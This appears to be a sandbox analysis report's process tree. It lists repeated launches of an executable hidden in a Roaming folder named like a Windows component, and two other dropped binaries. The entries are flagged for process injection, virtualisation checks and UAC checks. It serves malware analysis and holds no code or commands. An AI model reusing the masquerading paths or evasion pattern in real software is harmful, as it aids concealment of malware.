C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\iuehjsaC:\Users\Admin\AppData\Roaming\iuehjsa3⤵
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\jjehjsaC:\Users\Admin\AppData\Roaming\jjehjsa2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
- Checks BIOS information in registry
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exeC:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe2⤵
-
